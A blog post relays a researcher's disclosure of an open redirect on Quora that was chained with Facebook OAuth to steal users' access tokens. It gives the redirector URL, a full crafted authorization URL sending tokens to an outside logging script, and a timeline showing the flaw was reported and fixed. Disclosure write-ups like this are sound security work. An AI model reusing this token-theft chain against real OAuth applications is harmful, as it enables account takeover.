How A Vulnerability in PWNQUEST Can Lead to Hacking of Facebook Account
Well, We have already discussed many ways that a can use to hack a facebook account, however in this post we will discuss about an unpatched flaw inside the facebook oauth design.
An Independent security researcher and a very good friend of mine "Prakhar Prasad" exploited a flaw inside the oauth of Facebook, but the problem is that there is not much facebook can do in this scenario, Almost all the oauth flaws that have occurred on facebook have some thing to do with tampering the redirect_uri parameter, with this flaw facebook cannot do much since they do not have much control on the part which we will discuss. Successful exploitation of this attack may lead to a full account compromise, however this solely depends upon the permission that the user assigns to the application, in most cases you won't be able to do much other then updating the user's status.
Exclusively for RHA readers Prakhar was kind enough to make a step by step demonstration of how the attack was carried. Over to Prakhar.
I wanted to share the details of an open redirection vulnerability, which I found a popular Q/A website quora, possessing Alexa rank of around 800 worldwide and how someone can exploit the issue to hack Facebook accounts.
So, let's come to the topic. While signing up for Quora website, I preferred using Facebook Connect which gives "limited" access to my account to Quora, so that website can fetch necessary details from my Facebook account for registration. I noticed www.quora.com was permitted to receive the access_token from Facebook OAuth, any other domain other than www.quora.com would result in a failure of that request. See below
Cool, I needed to find an open redirection inside the www.quora.com to steal the access_token of any Quora user who signed-up using Facebook and has App enabled.
Luckily I found a redirection issue in the contacts import page itself. The redirector was like:
https://www.quora.com/contacts/skip?goto=http://www.google.com
So this link would redirect to http://www.google.com, accordingly I can redirect users to any domain of my choice.
Now I made a script that would save the token from URL into a file and redirect [unsuspecting] user to Facebook homepage. It was located at http://poc.prakharprasad.com/quora
1. A Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token.
2. As discussed we know next can be any page/resource under www.quora.com. So next parameter must be set to https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora ,when redirection happens the token is first sent to (allowed domain) www.quora.com then another redirection [open redirection] moves the token to http://poc.prakharprasad.com/quora where my script will do its job.
Final OAuth authorization URL that would steal the access_token looks like
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token
Using the stolen access_token I can, for example publish a status on victim's profile.
Quora App has 500,000+ monthly users on Facebook.So, all of them were at risk!
As usual, here's the video demo :
Timeline:
8th June 2013 - Vulnerability Found
9th June 2013 - Vulnerability Reported
13th June 2013 - No Reply from Quora
13th June 2013 - Another notification sent to Quora staff member, got a reply acknowledging the issue
14th June 2013- Fix deployed on Quora, public disclosure